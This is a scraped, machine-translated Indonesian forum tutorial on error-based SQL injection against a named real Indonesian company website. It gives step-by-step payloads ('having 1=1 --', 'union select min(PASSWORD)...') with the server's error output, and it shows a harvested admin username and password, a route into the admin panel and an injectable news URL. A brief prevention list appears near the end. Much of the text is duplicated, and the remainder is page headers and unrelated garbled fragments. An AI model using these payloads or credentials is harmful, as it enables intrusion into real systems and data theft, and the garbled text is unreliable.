8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
1/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
2/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
3/67
Nuk endangsolikin sub
agungBreaking the Web with Step-by-Step SQL InjectionSubmitted by ArBoy on Sun, 18/10/2009 - 15:54
Until March 2006, there is still a web site in the Republic of Indonesia is broken with SQL Injectiontechniques. You know how dangerous this one bug? Here we will present step by step SQL Injection isdirectly taken from the writings iko ([email protected])
Note: we will limit discussion on SQL Injection in MS-SQL Server.We'll take the example of site-www.pln wilkaltim.co.id
There are two weaknesses in this site, namely:1. Table News2. Table Admin
The first step, we determine which holes can be injectthe road to walk (Enumeration) they will be used on site.We will find a way 2 model input parameters, namely byI enter through the input box and put it through
URL address.We take the easiest first, by way of the input box. Then we search box for admin login.Found in www.pln-wilkaltim.co.id/sipm/admin/admin.aspThe first step to determine the table name and fieldnya,we inject NIP box with the command (the password is up, let the branch aja): 'having 1 = 1 --do not forget to write the single quotes and double hyphens (important).The second meaning can be a sign they will be looking at the tutorial SQL Injectionin this www.neoteker.or.id (see archives above).
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
4/67
Then will come out error message:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NOMOR' is invalid in the select list becauseit is not contained in an aggregate function and
there is no GROUP BY clause./ sipm / admin / dologin.asp, line 7-------Get out of our first field name!Write down the name of the table: T_ADMIN
Note the name field: NO
Then we will find the name of the next fields,along with the table name may vary.We inject the NIP box (the password is up to):'Group by T_ADMIN.NOMOR having 1 = 1 --Going out error messages:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NIP' is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./ sipm / admin / dologin.asp, line 7-------This means that the name of the table and our second field.
Note: T_ADMIN.NIP
Then we find the field to three:'Group by T_ADMIN.NOMOR, T_ADMIN.NIP having 1 = 1 --Going out error messages:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.PASSWORD' is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./ sipm / admin / dologin.asp, line 7-------Write down the field to three: T_ADMIN.PASSWORD
Perform the above steps until we find the last field.
Here is the error message occurs, if we check the last field with her inject:'Group by T_ADMIN.NOMOR, T_ADMIN.NIP, T_ADMIN.PASSWORD,T_ADMIN.NAMA, T_ADMIN.KD_RANTING, T_ADMIN.ADDRESS, T_ADMIN.EMAILhaving 1 = 1 --
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
5/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
6/67
We must repeat the above command to columnnext to the road in nama_kolom change:'Union select sum (nama_kolom) from T_ADMIN -with the next column.We have 7 type column:
T_ADMIN.NOMOR => numericT_ADMIN.NIP => char T_ADMIN.PASSWORD => nvarchar T_ADMIN.NAMA => char T_ADMIN.KD_RANTING => char T_ADMIN.ADDRESS => nvarchar T_ADMIN.EMAIL => char
The next step, we will search the contents of password fields,for user admin, with her inject:'Union select min (NAMA), 1,1,1,1,1,1 from T_ADMIN where NAME>' a'-means we choose the minimum user name greater than 'a'and tried to convert it to type integer.Meaning the number 1 as 6 times it is that we only choose
NAME column, and ignore the other columns 6.Going out error messages:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the varchar value 'bill' toa column of data type int./ sipm / admin / dologin.asp, line 7-------You see:varchar value 'bill''bill' was the name of the user in the last record entered,or fill in the NAME column the last record inserted.
Next we inject:'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where
NAME = 'bill' -note: must be a line (not cut).Going out error:-------Microsoft OLE DB Provider for ODBC Drivers (0 80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the nvarchar value 'm @ mpusk @ u' to acolumn of data type int./ sipm / admin / dologin.asp, line 7-------This means that we succeed!We get[+] NAME = bill
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
7/67
[+] PASSWORD = m @ mpusk @ u
Please login to:www.pln-wilkaltim.co.id/sipm/admin/admin.aspwith the above account, was a branch, pleasecontents itself with trial and error (
Or we use the shortcut it ....
We inject it:'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMINwhere NAME = 'bill' -note: must be a single line.Duarrrrrr ... ... ....Glhodhak ... ... ... ....Straight into the admin menu.Remember: do not make damage! tell the admin!
The second hole is in the news.Basically there is the news content of the tableanother. So can we inject tetep!The difference is, we must enter the parameters in its URL address.Example:www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2no parameters id and idSM.When we try to inject, it is influentialid parameters aja (CMIIW).
We inject it:www.pln-wilkaltim.co.id/dari_Media.asp?id=2119 'having 1 = 1 --going out error message:---------Microsoft OLE DB Provider for ODBC Drivers (0 80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'tb_news.NewsId' is invalid in the select list becauseit is not contained in an aggregate function andthere is no GROUP BY clause./ dari_Media.asp, line 58---------means 'tb_news.NewsId' is the name of our tables and columnsfirst.
Repeat the steps above until we get:tb_news.NewsId => numerictb_news.NewsCatId => numerictb_news.EntryDate => datetimetb_news.Title => nvarchar tb_news.Content =>tb_news.FotoLink =>
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
8/67
tb_news.FotoType => bits of datatb_news.review =>tb_news.sumber => char tb_news.dateagenda => datetime
Well, next is your own work to develop
your knowledge.You are able to insert the news that you can set yourself contents.
This is why the holes in MS-SQL Server is so dangerous.
In my estimation, the names of the parties in the Commission website is in hack by Shizoprenic, also in the tables of a database,so inaccessible tetep SQL Injection by this.
************************************************** ****SPECIAL FOR ADMIN & WEB PROGRAMMER!************************************************** ****How to prevent common use:1. Limit the length of the input box (if possible), withhow to limit the program code, so the cracker beginnerswill be confused for a moment to see her input box can not ininject with a long command.2. Filter input is entered by the user, especially the use of single quotes (Input Validation).3. Turn off or hide error messages that came outfrom SQL Server is running.4. Turn off the standard facilities such as Stored Procedures,Extended Stored Procedures if possible.5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Well that's probably what I can tell you ... ..It is a picture, how the Internet world is not safe ...If you want more secure, off your network cable, off the disk drive, off your hard drive, you kompie sale!Just kidding:)CommentsSubmitted by ArBoy on Thu, 20/10/2009 - 16:42.# 1ArBoy's pictureMember since:17 October 2009Last activity:4 weeks 2 days
certainly understand dong ga ...
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
9/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
10/67
1. Table News2. Table Admin
The first step, we determine which holes can be injectthe road to walk (Enumeration) they will be used on site.We will find a way 2 model input parameters, namely by
I enter through the input box and put it throughURL address.
We take the easiest first, by way of the input box.Then we search box for admin login.Found in www.pln-wilkaltim.co.id/sipm/admin/admin.aspThe first step to determine the table name and fieldnya,we inject NIP box with the command (the password is up, the branchlet aja):'Having 1 = 1 --do not forget to write the single quotation marks and signsdouble minus (important).The second meaning can be a sign they will be looking at the tutorial SQL Injectionin this www.neoteker.or.id (see archives above).Then will come out error message:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NOMOR' is invalid in the select list becauseit is not contained in an aggregate function andthere is no GROUP BY clause./ sipm / admin / dologin.asp, line 7--------------------Get out of our first field name!Write down the name of the table: T_ADMIN
Note the name field: NO
Then we will find the name of the next fields,along with the table name may vary.We inject the NIP box (the password is up to):'Group by T_ADMIN.NOMOR having 1 = 1 --Going out error messages:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column'T_ADMIN.NIP' is invalid in the select list becauseit is not contained in either an aggregatefunction or the GROUP BY clause./ sipm / admin / dologin.asp, line 7--------------------This means that the name of the table and our second field.
Note: T_ADMIN.NIP
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
11/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
12/67
--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft] [ODBC SQL Server Driver] [SQL Server] All queriesin an SQL statement containing a UNION operator must havean equal number of expressions in their target lists./ sipm / admin / dologin.asp, line 7
-------------------- NUMBER column that is numeric type.
Next we inject:'Union select sum (NIP) from T_ADMIN --Going out error messages:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sumor average aggregate operation can not take a char datatype as an argument./ sipm / admin / dologin.asp, line 7--------------------Means bertype char NIP column.
We must repeat the above command to columnnext to the road in nama_kolom change:'Union select sum (nama_kolom) from T_ADMIN --with the next column.We have 7 type column:T_ADMIN.NOMOR => numericT_ADMIN.NIP => char T_ADMIN.PASSWORD => nvarchar T_ADMIN.NAMA => char T_ADMIN.KD_RANTING => char T_ADMIN.ADDRESS => nvarchar T_ADMIN.EMAIL => char
The next step, we will search the contents of password fields,for user admin, with her inject:'Union select min (NAMA), 1,1,1,1,1,1 from T_ADMIN where NAME>' a'--means we choose the minimum user name greater than 'a'and tried to convert it to type integer.Meaning the number 1 as 6 times it is that we only choose
NAME column, and ignore the other columns 6.Going out error messages:--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the varchar value 'bill' toa column of data type int./ sipm / admin / dologin.asp, line 7--------------------
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
13/67
You see:varchar value 'bill''bill' was the name of the user in the last record entered,or fill in the NAME column the last record inserted.
Next we inject:
'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where NAME = 'bill' --note: must be a line (not cut).Going out error:---------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntaxerror converting the nvarchar value 'm @ mpusk @ u' to acolumn of data type int./ sipm / admin / dologin.asp, line 7---------------------This means that we succeed!We get[] NAME = bill[] PASSWORD = m @ @ u mpusk
Please login to:www.pln-wilkaltim.co.id/sipm/admin/admin.aspwith the above account, was a branch, pleasecontents itself with trial and error
Or we just use the shortcut ....
We inject it:'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMINwhere NAME = 'bill' --note: must be a single line.Duarrrrrr ..........Glhodhak .............Straight into the admin menu.Remember: do not make damage! tell the admin!
The second hole is in the news.Basically there is the news content of the tableanother. So can we inject tetep!The difference is, we must enter the parameters in its URL address.Example:www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2no parameters id and idSM.When we try to inject, it is influentialid parameters aja (CMIIW).
We inject it:
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
14/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
15/67
4. Turn off the standard facilities such as Stored Procedures,Extended Stored Procedures if possible.5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Well that's maybe what I can tell .....It is a picture, how the Internet world is not safe ...If you want more secure, off your network cable, off the disk drive, off your hard drive, you kompie sale!
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
16/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
17/67
Just kidding)
Reference:[] Sqlinjection, www.BlackAngels.it[] Anvanced sql injection in sql server applications(www.ngssoftware.com)[] Sql injection walktrough (www.securiteam.com
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
18/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
19/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
20/67
eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry againdrinking to pay the debt when the refundable credit, day and night thinking about debt
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
21/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
22/67
klaten agungiskandar marmoiskandar
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
23/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
24/67
eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry againdrinking to pay the debt when the refundable credit, day and night thinking about debt
sub edi mugirohklaten agung
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
25/67
iskandar marmoiskandar
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
26/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
27/67
Susilowati agungahmadi iksan harismugiroh klaten
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
28/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
29/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
30/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
31/67
sub edi mugirohklaten agung
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
32/67
iskandar marmoiskandar
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
33/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
34/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
35/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
36/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
37/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
38/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
39/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
40/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
41/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
42/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
43/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
44/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
45/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
46/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
47/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
48/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
49/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
50/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
51/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
52/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
53/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
54/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
55/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
56/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
57/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
58/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
59/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
60/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
61/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
62/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
63/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
64/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
65/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
66/67
8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
67/67